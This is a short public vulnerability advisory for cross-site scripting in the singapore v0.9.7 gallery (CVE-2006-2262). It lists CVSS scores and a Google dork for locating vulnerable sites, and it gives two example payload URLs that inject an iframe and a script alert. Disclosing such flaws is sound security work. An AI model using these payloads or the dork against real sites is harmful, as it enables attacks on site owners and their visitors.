singapore v0.9.7 XSS Vulnerabilities

Published
Credit
Risk
2006.05.09
alp_eren ayyildiz org
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2006-2262
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.6/10
2.9/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

SOFTWARE:

=========

singapore v0.9.7

DESCRIPTION:

============

The system is vulnerable to various XSS attacks

google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery

429 results :)

xss code example

================

www.site.com/images/index.php?gallery=[gallery name]&#132;&#145;=<iframe%20src="http://www.yoursite.com">

www.site.com/images/index.php?gallery=[gallery name]&#132;&#145;=<script>alert("lol")<script>

mail: alp_eren[at]ayyildiz[dot]com

web : http://www.ayyildiz.org

greets to thehacker,iskorpitx,suskun,shadow, and all AYT member


See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP


Copyright 2015, cxsecurity.com